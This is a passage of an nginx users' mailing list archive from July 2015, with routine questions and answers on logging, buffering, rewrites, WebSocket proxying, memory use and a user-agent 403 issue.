        access_log /export/local/opt/ngnix/logs/access.log main;

        sendfile on;
        #tcp_nopush on;

        keepalive_timeout 65;

        #gzip on;

        include /etc/nginx/conf.d/*.conf;
    }

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260593,260593#msg-260593

From francis at daoine.org Tue Jul 28 22:45:33 2015
From: francis at daoine.org (Francis Daly)
Date: Tue, 28 Jul 2015 23:45:33 +0100
Subject: Using dynamic access_log, automatically create parent directory
In-Reply-To:
References:
Message-ID: <20150728224533.GZ23844@daoine.org>

On Sun, Jul 26, 2015 at 10:49:01PM -0400, justink101 wrote:

Hi there,

> We use a dynamic value for access logs:
>
> access_log /var/log/nginx/domains/$host/access.log main;
>
> However, if the $host directory does not exist in /var/log/nginx/domains
> nginx fails with an error creating the access log. Is there a way to have
> nginx create the $host directory automatically instead of failing?

Not in stock nginx.

You could create a patch to do it; but I suspect that the overhead of an extra "mkdir -p"-like call for every log line written would not be worth it.

If you are willing to rearrange your log file structure such that the variable part is in the filename, and not a parent directory name, then stock nginx can help you.

> Seems like this should be default behavior?

I think "no".

But it's the person who writes the code who has the opinion that matters; at least for their local version of nginx.

f
--
Francis Daly francis at daoine.org

From lists at ruby-forum.com Wed Jul 29 05:44:05 2015
From nginx-forum at nginx.us Wed Jul 29 11:14:21 2015
From: nginx-forum at nginx.us (tunist)
Date: Wed, 29 Jul 2015 07:14:21 -0400
Subject: mp4 streaming/seeking works from firefox (fedora) and not from firefox (windows) (nginx 1.9.3)
Message-ID: <3e13103f2fbe0508b4c57caebad87e19.NginxMailingListEnglish@forum.nginx.org>

greetings!

i am seeing an unexplained malfunction here with nginx when serving videos. flv and mp4 files have different symptoms. mp4 streams correctly when i view the file in firefox 39 in fedora 22, but in windows 7 (firefox 39) the file cannot be 'seeked' and must be played linearly.

after speaking with the coders of video.js (the player i use), it was determined that nginx is not returning byte range data appropriately (or at all) - so seeking would not work. however, this does not explain why firefox 39 in fedora works perfectly and does not provide a solution as to how to get nginx to serve correctly.

the only advice i have seen is to change the value of the 'max_ranges' directive - but doing that has made no difference. i have left it as 'unset' - which i understand to mean 'unlimited'.

an example video from the server is here:
src="https://www.ureka.org/file/play/17924/censored%20on%20google%202.mp4"

any tips welcomed! thanks

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260615,260615#msg-260615

From nginx-forum at nginx.us Wed Jul 29 13:42:47 2015
From: nginx-forum at nginx.us (evgeni22)
Date: Wed, 29 Jul 2015 09:42:47 -0400
Subject: problem with images after refresh website
Message-ID: <781fc3edb66a81d0d068982d4d021348.NginxMailingListEnglish@forum.nginx.org>

Hi

I run directadmin+nginx1.8+php5.4 php-fpm.

When I refresh the website the images do not refresh well; sometimes after a refresh it puts images in the wrong place or doubles the images.

You can look at this website, rhost(dot)biz; you can try refreshing a few times and look at the images and you will see the problem.

What can be the problem?

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260621,260621#msg-260621

From nginx-forum at nginx.us Wed Jul 29 13:53:22 2015
From: nginx-forum at nginx.us (Jugurtha)
Date: Wed, 29 Jul 2015 09:53:22 -0400
Subject: log files as non root user
In-Reply-To: <75686701f8efe8909a567b3fec836d3e.NginxMailingListEnglish@forum.nginx.org>
References: <75686701f8efe8909a567b3fec836d3e.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <9a4b2e24c3449c7f73115408e50afefb.NginxMailingListEnglish@forum.nginx.org>

Hello,

If you start your nginx process with root (login), your master process will start with root but the "worker process" and "cache manager" with usradmin:mwgroup (you can test with this command "ps aux | grep nginx").

You can try to start nginx with the usradmin account: "su - usradmin ; /etc/init.d/nginx start", this will solve the rights issue.

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260593,260622#msg-260622

From t.glaser at tarent.de Wed Jul 29 15:00:40 2015
From: t.glaser at tarent.de (Thorsten Glaser)
Date: Wed, 29 Jul 2015 17:00:40 +0200 (CEST)
Subject: 403 errors with standard browser, pages work with GUI browser
Message-ID:

Hi,

I've run across several websites where I get a 403 error when I connect to them with my standard webbrowser (lynx), yet the very same URIs work with the GUI browser fallback (Firef*x).

Example link:
http://blog.streamingmedia.com/2015/07/new-patent-pool-wants-share-of-revenue-from-content-owners.html

Output from webbrowser:

    403 Forbidden

    403 Forbidden
    ______________________________________________________________________________________________
    nginx

All of these sites have in common that they have an nginx error message, so this must be connected to your software somehow.

To add insult to injury, this appears to be dependent on the User-Agent HTTP header: "Mozilla/5.0 (compatible)" works, "Lynx/2.8.9dev.6" works, "Lynx/2.8.9dev.6 libwww-FM/2.14" doesn't, nor "Mozilla/5.0 (compatible) libwww-FM/2.14".

It appears that there is some blacklist on some component of my webbrowser. Please kindly remove it.

Thanks,
//mirabilos
--
>> Why don't you use JavaScript? I also don't like enabling JavaScript in
> Because I use lynx as browser.
+1
	-- Octavio Alvarez, me and ????? (Mario Lang) on debian-devel

From francis at daoine.org Wed Jul 29 15:23:08 2015
From: francis at daoine.org (Francis Daly)
Date: Wed, 29 Jul 2015 16:23:08 +0100
Subject: 403 errors with standard browser, pages work with GUI browser
In-Reply-To:
References:
Message-ID: <20150729152308.GA23844@daoine.org>

On Wed, Jul 29, 2015 at 05:00:40PM +0200, Thorsten Glaser wrote:

Hi there,

> I’ve run across several websites where I get a 403 error when
> I connect to them with my standard webbrowser (lynx), yet the
> very same URIs work with the GUI browser fallback (Firef*x).

> All of these sites is common that they have an nginx error
> message, so this must be connected to your software somehow.

That suggests that they run nginx as their web server. There is unlikely to be any other connection.

> To add insult to injury, this appears to be dependent on
> the User-Agent HTTP header: “Mozilla/5.0 (compatible)”
> works, “Lynx/2.8.9dev.6” works, “Lynx/2.8.9dev.6 libwww-FM/2.14”
> doesn’t, nor “Mozilla/5.0 (compatible) libwww-FM/2.14”.
>
> It appears that there is some blacklist on some component
> of my webbrowser. Please kindly remove it.

I suspect that they have configured their instance of their web server to deny access to user agents which include the string "libwww".

I suspect that your best option for accessing the content is to change your web browser user agent string to omit "libwww" (and whatever other parts the server owner has chosen to block); at least until you contact the owner and convince them to change their configuration.

Good luck with it,

f
--
Francis Daly francis at daoine.org
From vikrant.thakur at gmail.com Wed Jul 29 16:37:00 2015
From: vikrant.thakur at gmail.com (vikrant singh) Date: Wed, 29 Jul 2015 09:37:00 -0700 Subject: upstart conf for managing nginx In-Reply-To: <20150725070023.GY23844@daoine.org> References: <20150725070023.GY23844@daoine.org> Message-ID: Thanks for your reply.. and pointing out the typo. nginx doesnt comes up, and upstart command hangs, I have to kill it to come out of it. Changing path did not helped and neither does expect fork (but I do agree I need fork and not daemon) . It turned out that I named my conf file as "nginx.conf", and it was causing the problem. I guess because it is also trying to start a binary with same name (but not sure). Changing the name of config file fixed the issue.. and I am able to use upstart conf to manage nginx. On Sat, Jul 25, 2015 at 12:00 AM, Francis Daly wrote: > On Fri, Jul 24, 2015 at 04:09:02PM -0700, vikrant singh wrote: > > Hi there, > > > I wrote a small upstart script to stop/start nginx through upstart. This > is > > how it looks > > I do not have an upstart system to test on, but: > > * comparing with http://wiki.nginx.org/Upstart, you have "expect daemon" > and that has "expect fork". > > * the binary you run is /usr/local/nginx/nginx; I think it is more common > for it to be /usr/local/nginx/sbin/nginx. > > Does checking and changing either of those make a difference? > > Does "hangs" mean "things run fine eventually, but there is a delay"; > or "things never run correctly"? > > (Is there anything in the nginx or upstart logs which might indicate > the problem?) > > f > -- > Francis Daly francis at daoine.org > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Wed Jul 29 18:55:54 2015 
From: nginx-forum at nginx.us (doolli_doug) Date: Wed, 29 Jul 2015 14:55:54 -0400 Subject: Default access_log buffering Message-ID: <69d6fb553f3c8eb7d54cf642901b4bd9.NginxMailingListEnglish@forum.nginx.org> I was reading an article on performance on the Nginx site: https://www.nginx.com/blog/tuning-nginx/ One thing mentioned was enabling buffering on the access_log. However, the directive reference (http://nginx.org/en/docs/http/ngx_http_log_module.html#access_log) says that the default buffer size is 64 KB. Does this mean that buffering is enabled by default, with a size of 64 KB, or that if the buffer is enabled without a specified size, it will be 64 KB? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260630,260630#msg-260630 From mdounin at mdounin.ru Wed Jul 29 19:58:22 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 29 Jul 2015 22:58:22 +0300 Subject: Default access_log buffering In-Reply-To: <69d6fb553f3c8eb7d54cf642901b4bd9.NginxMailingListEnglish@forum.nginx.org> References: <69d6fb553f3c8eb7d54cf642901b4bd9.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150729195822.GT19190@mdounin.ru> Hello! On Wed, Jul 29, 2015 at 02:55:54PM -0400, doolli_doug wrote: > I was reading an article on performance on the Nginx site: > https://www.nginx.com/blog/tuning-nginx/ One thing mentioned was enabling > buffering on the access_log. > > However, the directive reference > (http://nginx.org/en/docs/http/ngx_http_log_module.html#access_log) says > that the default buffer size is 64 KB. Does this mean that buffering is > enabled by default, with a size of 64 KB, or that if the buffer is enabled > without a specified size, it will be 64 KB? The default buffer size the documentation talks about is one used if you enable the "gzip" parameter, but don't specify buffer size explicitly. -- Maxim Dounin http://nginx.org/ From karljohnson.it at gmail.com Wed Jul 29 20:45:31 2015 
From: karljohnson.it at gmail.com (Karl Johnson) Date: Wed, 29 Jul 2015 16:45:31 -0400 Subject: Tweak fastcgi_buffer In-Reply-To: <20150723192124.GB19190@mdounin.ru> References: <20150723192124.GB19190@mdounin.ru> Message-ID: On Thu, Jul 23, 2015 at 3:21 PM, Maxim Dounin wrote: > Hello! > > On Wed, Jul 22, 2015 at 05:50:12PM -0400, Karl Johnson wrote: > > > Hello, > > > > I need to tweak fastcgi_buffer to 1m on a website that has heavy requests > > to avoid buffer. If I use a distro with 4096 pagesize, is it better to do > > 256x 4k or 4x 256k? > > > > [root at web ~]# getconf PAGESIZE > > 4096 > > [root at web ~]# > > > > fastcgi_buffer_size 4k; > > fastcgi_buffers 256 4k; > > > > OR > > > > fastcgi_buffer_size 256k; > > fastcgi_buffers 4 256k; > > I would recommend the latter. Or, alternatively, something like > > fastcgi_buffers 8 128k; > > Too many small buffers will result in extra processing overhead, > and it's unlikely to be a good solution. > Thanks for the recommendation Maxim. There's no issue setting the buffer to 128k when the pagesize is 4k? Karl -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Wed Jul 29 21:59:01 2015 
From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 30 Jul 2015 00:59:01 +0300 Subject: Tweak fastcgi_buffer In-Reply-To: References: <20150723192124.GB19190@mdounin.ru> Message-ID: <20150729215901.GW19190@mdounin.ru> Hello! On Wed, Jul 29, 2015 at 04:45:31PM -0400, Karl Johnson wrote: > On Thu, Jul 23, 2015 at 3:21 PM, Maxim Dounin wrote: > > > Hello! > > > > On Wed, Jul 22, 2015 at 05:50:12PM -0400, Karl Johnson wrote: > > > > > Hello, > > > > > > I need to tweak fastcgi_buffer to 1m on a website that has heavy requests > > > to avoid buffer. If I use a distro with 4096 pagesize, is it better to do > > > 256x 4k or 4x 256k? > > > > > > [root at web ~]# getconf PAGESIZE > > > 4096 > > > [root at web ~]# > > > > > > fastcgi_buffer_size 4k; > > > fastcgi_buffers 256 4k; > > > > > > OR > > > > > > fastcgi_buffer_size 256k; > > > fastcgi_buffers 4 256k; > > > > I would recommend the latter. Or, alternatively, something like > > > > fastcgi_buffers 8 128k; > > > > Too many small buffers will result in extra processing overhead, > > and it's unlikely to be a good solution. > > > > Thanks for the recommendation Maxim. There's no issue setting the buffer to > 128k when the pagesize is 4k? No issues, though large buffers imply some memory waste when last buffer isn't fully used. So usually you should consider some balance between number of buffers and their size. -- Maxim Dounin http://nginx.org/ From lists at ruby-forum.com Thu Jul 30 03:31:45 2015 
From nginx-forum at nginx.us Thu Jul 30 07:57:41 2015 From: nginx-forum at nginx.us (evgeni22) Date: Thu, 30 Jul 2015 03:57:41 -0400 Subject: problem with images after refresh website In-Reply-To: <781fc3edb66a81d0d068982d4d021348.NginxMailingListEnglish@forum.nginx.org> References: <781fc3edb66a81d0d068982d4d021348.NginxMailingListEnglish@forum.nginx.org> Message-ID: <27b17494cd9149396faf0ff128c3e203.NginxMailingListEnglish@forum.nginx.org> fixed was problem with timeout timeout 2 increase it to timeout 10 Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260621,260643#msg-260643 From nginx-forum at nginx.us Thu Jul 30 08:07:05 2015 
From: nginx-forum at nginx.us (evgeni22) Date: Thu, 30 Jul 2015 04:07:05 -0400 Subject: does it normal? Message-ID: <7252849dbd532e9f9807ee605e23e563.NginxMailingListEnglish@forum.nginx.org> my server info: Processor Intel Xeon E3 1225v2 RAM 32GB DDR3 Disks 3 x 120 GB SSD i run directadmin+nginx the nginx use 14gb of 32gb and this output from server: root 12872 0.0 38.8 12868180 12748776 ? Ss 09:35 0:00 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf nginx 12873 0.0 38.8 12889524 12759540 ? S 09:35 0:00 nginx: worker process nginx 12882 0.0 38.8 12876504 12756964 ? S 09:35 0:00 nginx: worker process nginx 12883 0.0 38.8 12879652 12757656 ? S 09:35 0:00 nginx: worker process nginx 12884 0.0 38.8 12872432 12753532 ? S 09:35 0:00 nginx: worker process when i do restart to nginx service it take 2min 40second to restart. after restart it immediately use 14gb of ram does it normal for nginx? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260644,260644#msg-260644 From pablo at pablo.com.mx Thu Jul 30 08:28:47 2015 From: pablo at pablo.com.mx (Pablo Fischer) Date: Thu, 30 Jul 2015 01:28:47 -0700 Subject: Memory zone usage Message-ID: Howdy! Was wondering if there's a way to know the memory usage that a zone (like limit_req) is having? Reason I ask is because I think I'm the value I've today might me a bit high but before I change it I would like to check during the day what is its current usage. Thanks! -- Pablo From maxim at nginx.com Thu Jul 30 10:34:04 2015 From: maxim at nginx.com (Maxim Konovalov) Date: Thu, 30 Jul 2015 13:34:04 +0300 Subject: blog post: new debugging features in nginx Message-ID: <55B9FD9C.1050203@nginx.com> Hello, Andrew Hutchings wrote a blog post about new debugging features you can find in nginx 1.9.2 and later: https://www.nginx.com/blog/new-debugging-features-probe-nginx-internals/ -- Maxim Konovalov http://nginx.com From edigarov at qarea.com Thu Jul 30 14:57:49 2015 
From: edigarov at qarea.com (Gregory Edigarov) Date: Thu, 30 Jul 2015 17:57:49 +0300 Subject: tell nginx to stay inside same location? Message-ID: <55BA3B6D.8080404@qarea.com> Hello, is that possible to tell nginx to stay inside the same location after rewrite rule is done? i.e. I have: location /njs/ { proxy_pass http://localhost:5501; ...... } now, if i need to cut off /njs/ part, i added the following: location /njs/ { rewrite /njs(.*) $1; proxy_pass http://localhost:5501; .......... } but, that doesn't work, because my uri has changed and nginx goes to the default location, which I don't need. what could I do in this situation? -- With best regards, Gregory Edigarov From me at myconan.net Thu Jul 30 15:02:16 2015 
From: me at myconan.net (Edho Arief) Date: Fri, 31 Jul 2015 00:02:16 +0900 Subject: tell nginx to stay inside same location? In-Reply-To: <55BA3B6D.8080404@qarea.com> References: <55BA3B6D.8080404@qarea.com> Message-ID: On Thu, Jul 30, 2015 at 11:57 PM, Gregory Edigarov wrote: > Hello, > > is that possible to tell nginx to stay inside the same location after > rewrite rule is done? > > i.e. I have: > > location /njs/ { > proxy_pass http://localhost:5501; > ...... > } > > now, if i need to cut off /njs/ part, i added the following: > location /njs/ { > rewrite /njs(.*) $1; > proxy_pass http://localhost:5501; > .......... > } > > but, that doesn't work, because my uri has changed and nginx goes to the > default location, which I don't need. > > what could I do in this situation? > if only you have read the documentation... http://nginx.org/r/proxy_pass ... When the URI is changed inside a proxied location using the rewrite directive, and this same configuration will be used to process a request (break): location /name/ { rewrite /name/([^/]+) /users?name=$1 break; proxy_pass http://127.0.0.1; } In this case, the URI specified in the directive is ignored and the full changed request URI is passed to the server. ... From nginx-forum at nginx.us Thu Jul 30 15:19:32 2015 
From: nginx-forum at nginx.us (nightcrawler)
Date: Thu, 30 Jul 2015 11:19:32 -0400
Subject: Websocket handshake failing
Message-ID: <879cb06ad3573d1c1bd1e2353d6e34fe.NginxMailingListEnglish@forum.nginx.org>

I'm trying to enable websocket communication between client and server and have nginx as proxy. I've applied the following configuration changes to websocket sites-enabled conf to allow for websocket proxy:

proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header X-Forwarded-For $http_x_forwarded_for;
proxy_set_header Host $http_host;
proxy_pass http://mywebsite;

Although the server receives the Connection: Upgrade header and responds with a Connection: Upgrade header as expected, the client gets only Connection: keep-alive and I see the following error on js-console

WebSocket connection to 'wss://mywebsite.dev/cometd/' failed: Error during WebSocket handshake: 'Connection' header value must contain 'Upgrade'

I feel that nginx might not be proxying the response correctly either due to incorrect response or bad config.

Can someone help me out with debugging this? A lot of places where I see this issue, usually the proxy does not support the websocket handshake which causes the handshake to fail.

Appreciate the help!

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260651,260651#msg-260651
From edigarov at qarea.com Thu Jul 30 15:40:50 2015
From: edigarov at qarea.com (Gregory Edigarov) Date: Thu, 30 Jul 2015 18:40:50 +0300 Subject: tell nginx to stay inside same location? In-Reply-To: References: <55BA3B6D.8080404@qarea.com> Message-ID: <55BA4582.8060001@qarea.com> On 07/30/2015 06:02 PM, Edho Arief wrote: > On Thu, Jul 30, 2015 at 11:57 PM, Gregory Edigarov wrote: >> Hello, >> >> is that possible to tell nginx to stay inside the same location after >> rewrite rule is done? >> >> i.e. I have: >> >> location /njs/ { >> proxy_pass http://localhost:5501; >> ...... >> } >> >> now, if i need to cut off /njs/ part, i added the following: >> location /njs/ { >> rewrite /njs(.*) $1; >> proxy_pass http://localhost:5501; >> .......... >> } >> >> but, that doesn't work, because my uri has changed and nginx goes to the >> default location, which I don't need. >> >> what could I do in this situation? >> > if only you have read the documentation... > > http://nginx.org/r/proxy_pass > > ... > When the URI is changed inside a proxied location using the rewrite > directive, and this same configuration will be used to process a > request (break): > > location /name/ { > rewrite /name/([^/]+) /users?name=$1 break; > proxy_pass http://127.0.0.1; > } > > In this case, the URI specified in the directive is ignored and the > full changed request URI is passed to the server. > ... > thank you very very much. I've read the docs, but skipped the break completely, somehow. From mdounin at mdounin.ru Thu Jul 30 17:31:43 2015 
From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 30 Jul 2015 20:31:43 +0300 Subject: does it normal? In-Reply-To: <7252849dbd532e9f9807ee605e23e563.NginxMailingListEnglish@forum.nginx.org> References: <7252849dbd532e9f9807ee605e23e563.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150730173143.GX19190@mdounin.ru> Hello! On Thu, Jul 30, 2015 at 04:07:05AM -0400, evgeni22 wrote: > my server info: > > Processor Intel Xeon E3 1225v2 > RAM 32GB DDR3 > Disks 3 x 120 GB SSD > > i run directadmin+nginx > > the nginx use 14gb of 32gb and this output from server: > > root 12872 0.0 38.8 12868180 12748776 ? Ss 09:35 0:00 nginx: > master process /usr/sbin/nginx -c /etc/nginx/nginx.conf > nginx 12873 0.0 38.8 12889524 12759540 ? S 09:35 0:00 nginx: > worker process > nginx 12882 0.0 38.8 12876504 12756964 ? S 09:35 0:00 nginx: > worker process > nginx 12883 0.0 38.8 12879652 12757656 ? S 09:35 0:00 nginx: > worker process > nginx 12884 0.0 38.8 12872432 12753532 ? S 09:35 0:00 nginx: > worker process > > when i do restart to nginx service it take 2min 40second to restart. > after restart it immediately use 14gb of ram > > does it normal for nginx? No, but depending on your settings and compiled in modules it may be what you've asked it to do. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Thu Jul 30 17:45:19 2015 
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Thu, 30 Jul 2015 20:45:19 +0300
Subject: Websocket handshake failing
In-Reply-To: <879cb06ad3573d1c1bd1e2353d6e34fe.NginxMailingListEnglish@forum.nginx.org>
References: <879cb06ad3573d1c1bd1e2353d6e34fe.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <20150730174518.GY19190@mdounin.ru>

Hello!

On Thu, Jul 30, 2015 at 11:19:32AM -0400, nightcrawler wrote:

> I'm trying to enable websocket communication between client and server and
> have nginx as proxy. I've applied the following configuration changes to
> websocket sites-enabled conf to allow for websocket proxy:
> proxy_set_header Upgrade $http_upgrade;
> proxy_set_header Connection "upgrade";
> proxy_set_header X-Forwarded-For $http_x_forwarded_for;
> proxy_set_header Host $http_host;
> proxy_pass http://mywebsite;
>
> Although the server receives the Connection: Upgrade header and responds
> with a Connection: Upgrade header as expected, the client gets only
> Connection: keep-alive and I see the following error on js-console
>
> WebSocket connection to 'wss://mywebsite.dev/cometd/' failed: Error during
> WebSocket handshake: 'Connection' header value must contain 'Upgrade'
>
> I feel that nginx might not be proxying the response correctly either due to
> incorrect response or bad config.
>
> Can someone help me out with debugging this? A lot of places where I see
> this issue, usually the proxy does not support the websocket handshake which
> causes the handshake to fail.

Connection upgrades are supported by nginx proxy starting with nginx 1.3.13. Make sure you are using recent enough version, not something from Debian oldstable.

You also need to configure nginx properly. Detailed documentation can be found here:

http://nginx.org/en/docs/http/websocket.html

In the config snippet you've provided at least "proxy_http_version 1.1;" seems to be missing.

If the above won't help, consider looking at nginx debugging logs.
See here for some basic hints: http://nginx.org/en/docs/debugging_log.html -- Maxim Dounin http://nginx.org/ From igor at sysoev.ru Thu Jul 30 19:18:38 2015 From: igor at sysoev.ru (Igor Sysoev) Date: Thu, 30 Jul 2015 22:18:38 +0300 Subject: tell nginx to stay inside same location? In-Reply-To: <55BA3B6D.8080404@qarea.com> References: <55BA3B6D.8080404@qarea.com> Message-ID: On 30 Jul 2015, at 17:57, Gregory Edigarov wrote: > Hello, > > is that possible to tell nginx to stay inside the same location after rewrite rule is done? > > i.e. I have: > > location /njs/ { > proxy_pass http://localhost:5501; > ...... > } > > now, if i need to cut off /njs/ part, i added the following: > location /njs/ { > rewrite /njs(.*) $1; > proxy_pass http://localhost:5501; > .......... > } > > but, that doesn't work, because my uri has changed and nginx goes to the default location, which I don't need. > > what could I do in this situation? Just add slash in upstream: location /njs/ { proxy_pass http://localhost:5501/; ...... } -- Igor Sysoev http://nginx.com From igor at sysoev.ru Thu Jul 30 19:34:23 2015 
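Added example, not part of any message in this archive: one nginx configuration that puts together the fixes discussed in the two threads above, the `proxy_http_version 1.1;` line missing from the WebSocket snippet and the two ways of dropping the `/njs/` prefix before proxying. The listen port, the upstream name `app_backend`, its address, the `/cometd/` location (taken from the URL in the error message) and the `/njs-alt/` location are assumptions for illustration.

```nginx
# Added example; names, ports and addresses are assumptions, not the posters' real setup.
events {}

http {
    # Send "Connection: upgrade" upstream only when the client actually
    # asked for a protocol upgrade; otherwise close the upstream connection.
    map $http_upgrade $connection_upgrade {
        default upgrade;
        ''      close;
    }

    upstream app_backend {
        server 127.0.0.1:8081;   # assumed application server
    }

    server {
        listen 8080;             # TLS termination left out to keep this self-contained

        # WebSocket endpoint.
        location /cometd/ {
            proxy_pass http://app_backend;

            # nginx talks HTTP/1.0 to upstreams by default; the Upgrade
            # mechanism requires HTTP/1.1, so this line is mandatory.
            proxy_http_version 1.1;

            # Upgrade and Connection are hop-by-hop headers and are not
            # forwarded unless set explicitly.
            proxy_set_header Upgrade    $http_upgrade;
            proxy_set_header Connection $connection_upgrade;

            proxy_set_header Host $host;

            # $http_x_forwarded_for forwards whatever the client sent, so the
            # backend cannot trust it. $proxy_add_x_forwarded_for appends the
            # address nginx saw ($remote_addr) to the client-supplied list.
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        }

        # Prefix stripping, variant 1: proxy_pass with a URI part ("/").
        # The part of the request URI matching the location is replaced by
        # that URI, so /njs/foo is requested upstream as /foo.
        location /njs/ {
            proxy_pass http://localhost:5501/;
        }

        # Prefix stripping, variant 2: rewrite with "break".
        # "break" stops rewrite processing and keeps the request in this
        # location; without it nginx searches for a new location using the
        # rewritten URI. proxy_pass has no URI part here, so the rewritten
        # URI is passed to the upstream unchanged.
        location /njs-alt/ {
            rewrite ^/njs-alt(/.*)$ $1 break;
            proxy_pass http://localhost:5501;
        }
    }
}
```

The file can be syntax-checked with `nginx -t -c /path/to/this.conf` before use.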
From: igor at sysoev.ru (Igor Sysoev)
Date: Thu, 30 Jul 2015 22:34:23 +0300
Subject: Free O’Reilly animal book about nginx
Message-ID: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru>

Nearly 20 years ago I read my first O’Reilly book, Learning Perl. Back then I never would have dreamed O’Reilly would someday publish a book written about the software I created, yet here we are today.

I am honored to announce that later this year O’Reilly Media will publish one of their iconic animal books entitled nginx: A Practical Guide to High Performance, and I’m delighted to offer you a preview edition download today. This five chapter preview covers:

* How to install nginx
* How to use nginx as a software load balancer
* How to set up nginx as a reverse proxy for serving dynamic web applications
* How to tune nginx for optimal performance and security
* And more!

I hope you enjoy the book.

--
Igor Sysoev
http://nginx.com
From nginx-forum at nginx.us Thu Jul 30 20:11:52 2015
From: nginx-forum at nginx.us (evgeni22) Date: Thu, 30 Jul 2015 16:11:52 -0400 Subject: does it normal? In-Reply-To: <20150730173143.GX19190@mdounin.ru> References: <20150730173143.GX19190@mdounin.ru> Message-ID: <53f8e589ded7fe4f00686da747106020.NginxMailingListEnglish@forum.nginx.org> nginx version: nginx/1.8.0 built by gcc 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) built with OpenSSL 1.0.1e-fips 11 Feb 2013 TLS SNI support enabled configure arguments: --add-module=../modsecurity_nginx-2.8.0/nginx/modsecurity --user=nginx --group=nginx --prefix=/usr --sbin-path=/usr/sbin --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/nginx.pid --http-log-path=/var/log/nginx/access_log --error-log-path=/var/log/nginx/error_log --with-ipv6 --without-mail_imap_module --without-mail_smtp_module --with-http_ssl_module --with-http_realip_module --with-http_stub_status_module --with-http_gzip_static_module --with-http_dav_module --with-cc-opt=''-D FD_SETSIZE=32768'' CentOS Linux release 7.1.1503 error.log 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity for nginx (STABLE)/2.8.0 (http://www.modsecurity.org/) configured. 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity: APR compiled version="1.5.1"; loaded version="1.5.1" 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity: PCRE compiled version="8.20 "; loaded version="8.20 2011-10-21" 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity: LIBXML compiled version="2.9.2" 2015/07/30 09:34:28 [notice] 12683#0: Original server signature: ModSecurity Standalone 2015/07/30 09:34:28 [notice] 12683#0: Status engine is currently disabled, enable it by set SecStatusEngine to On. other errors from time to time: kernel: grsec: From x.x.x.x: Segmentation fault occurred at 00000000000000e0 in /usr/sbin/nginx[nginx:8031] uid/euid:993/993 SELINUX=disabled at the moment: - Memory used.........: 13761 MB / 32067 MB - Swap in use.........: 2333 MB service nginx reload = it doubles the ram usage. over a few days it use all 32gb of ram, and start with swap. 
nginx.conf #user nginx; # The number of worker processes is changed automatically by CustomBuild, according to the number of CPU cores, if it's set to "1" worker_processes 4; pid /var/run/nginx.pid; error_log /var/logs//nginx/error.log; #error_log logs/error.log notice; #error_log logs/error.log info; events { include /etc/nginx/nginx-events.conf; } http { include /etc/nginx/mime.types; # access_log /var/log/nginx/access.log main; # For user configurations not maintained by DirectAdmin. Empty by default. include /etc/nginx/nginx-includes.conf; # Supplemental configuration include /etc/nginx/nginx-modsecurity-enable.conf; include /etc/nginx/nginx-defaults.conf; include /etc/nginx/nginx-gzip.conf; include /etc/nginx/directadmin-ips.conf; include /etc/nginx/directadmin-settings.conf; include /etc/nginx/nginx-vhosts.conf; include /etc/nginx/directadmin-vhosts.conf; } Average total traffic out from server is 41.1 kb/s. on 12 vhosts/domains. So what do i start with to find the problem? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260644,260659#msg-260659 From igal at lucee.org Thu Jul 30 20:12:00 2015 
From: igal at lucee.org (Igal @ Lucee.org)
Date: Thu, 30 Jul 2015 13:12:00 -0700
Subject: Re: Free O’Reilly animal book about nginx
In-Reply-To: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru>
References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru>
Message-ID: <55BA8510.5020702@lucee.org>

this is awesome news! congrats!!!

the download link is broken though (404).

Igal Sapir
Lucee Core Developer
Lucee.org

On 7/30/2015 12:34 PM, Igor Sysoev wrote:
>
> Nearly 20 years ago I read my first O’Reilly book, Learning Perl.
> Back then I never would have dreamed O’Reilly would someday publish
> a book written about the software I created, yet here we are today.
>
> I am honored to announce that later this year O’Reilly Media will
> publish one of their iconic animal books entitled
> nginx: A Practical Guide to High Performance,
> and I’m delighted to offer you a preview edition download today.
> This five chapter preview covers:
>
> * How to install nginx
>
> * How to use nginx as a software load balancer
>
> * How to set up nginx as a reverse proxy for serving dynamic web
> applications
>
> * How to tune nginx for optimal performance and security
>
> * And more!
>
> I hope you enjoy the book.
> --
> Igor Sysoev
> http://nginx.com
From mdounin at mdounin.ru Thu Jul 30 20:39:26 2015
